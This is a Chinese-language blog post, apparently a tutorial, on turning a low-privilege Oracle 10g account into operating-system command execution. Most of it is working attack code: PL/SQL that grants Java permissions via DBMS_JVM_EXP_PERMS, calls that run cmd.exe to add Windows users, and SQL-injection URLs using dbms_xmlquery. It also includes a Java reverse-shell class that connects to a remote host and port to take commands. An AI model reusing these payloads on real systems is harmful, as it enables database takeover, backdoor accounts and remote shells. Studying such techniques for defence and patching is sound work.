create user xiaozi identified by xiaozi;
grant create session to xiaozi;
10g 低权限提升
C:Documents and SettingsAdministrator>sqlplus xiaozi/xiaozi@orcl SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 11月 2 00:30:37 2016 Copyright (c) 1982, 2005, Oracle. All rights reserved. 连接到: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production With the Partitioning, OLAP and Data Mining options
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL>
SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual; 4 BEGIN 5 OPEN C1; 6 FETCH C1 BULK COLLECT INTO POL; 7 CLOSE C1; 8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 9 END; 10 / PL/SQL 过程已成功完成。 SQL> SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','w riteFileDescriptor',NULL,'ENABLED' FROM DUAL; 4 BEGIN 5 OPEN C1; 6 FETCH C1 BULK COLLECT INTO POL; 7 CLOSE C1; 8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 9 END; 10 / PL/SQL 过程已成功完成。 SQL> SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','r eadFileDescriptor',NULL,'ENABLED' FROM DUAL; 4 BEGIN 5 OPEN C1; 6 FETCH C1 BULK COLLECT INTO POL; 7 CLOSE C1; 8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 9 END; 10 / PL/SQL 过程已成功完成。 SQL> SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\wind ows\system32\cmd.exe', '/c', 'dir>c:\10gOUT.LST') FROM DUAL; DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\WINDOWS\SYSTEM3 -------------------------------------------------------------------------------- SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\wind ows\system32\cmd.exe','/c','net user abc abc /add') FROM DUAL; DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\WINDOWS\SYSTEM3 --------------------------------------------------------------------------------
Oracle 10g web注入技巧
create or replace and resolve java source named JAVACMD as import java.lang.*; import java.io.*; public class JAVACMD { public static void execmd(String command) throws IOException { Runtime.getRuntime().exec(command); } } create or replace procedure MYJAVACMD(command in varchar) as language java name 'JAVACMD.execmd(java.lang.String)'; exec MYJAVACMD('net user'); web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and resolve java source named JAVACMD as import java.lang.*;import java.io.*;public class JAVACMD{public static void execmd(String command) throws IOException{Runtime.getRuntime().exec(command);}} ''; commit; end;') from dual) is not null web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace procedure MYJAVACMD(command in varchar) as language java name ''''JAVACMD.execmd(java.lang.String)''''; ''; commit;end;') from dual) is not null web :http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('begin myjavacmd(''net user admin admin /add'') ;commit;end;') from dual) is not null create or replace and compile java source named javasocket as import java.net.*; import java.io.*; import java.lang.*; public class javasocket { public static void test(String addr,String str_port) { Socket socket; String len; String s; InputStream Is; OutputStream Os; DataInputStream DIS; PrintStream PS; try{ socket=new Socket(addr,Integer.parseInt(str_port)); Is=socket.getInputStream(); Os=socket.getOutputStream(); DIS=new DataInputStream(Is); PS=new PrintStream(Os); while(true){ s=DIS.readLine(); if(s.trim().equals("BYE"))break; try{ Runtime rt = Runtime.getRuntime(); Process p = null; p = rt.exec(s); s = null; BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); String msg = null; while((msg = br.readLine())!=null){ msg += " "; s += msg; } br.close(); } catch(Exception e) { s = "Please check your command!"; } PS.println(s); } DIS.close(); PS.close(); Is.close(); Os.close(); socket.close(); } catch(Exception e) { System.out.println("Error:"+e); } } } create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name 'javasocket.test(java.lang.String,java.lang.String)'; exec myjavasocket('192.168.106.137','9999'); SQL> drop java source javasocket; Java 已删除。 SQL> drop procedure myjavasocket; 过程已删除。 http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream(); Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals("BYE"))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += " "; s += msg;}br.close();}catch(Exception e){s = "Please check your command!";}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null-- http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null-- http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null-- 数字型和字符型,在于一个双引号的区别 http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream(); Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals(null))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += null; s += msg;}br.close();}catch(Exception e){s = null;}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null-- http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null-- http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考文章:
http://psoug.org/articles/Hacking-Aurora-in-Oracle-11g.htm/
http://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=B1A4B602FC83805EDBD9A0D0FA4E8D87?doi=10.1.1.210.3862&rep=rep1&type=pdf
https://www.notsosecure.com/hacking-oracle-11g/
http://www.tuicool.com/articles/QFvAFr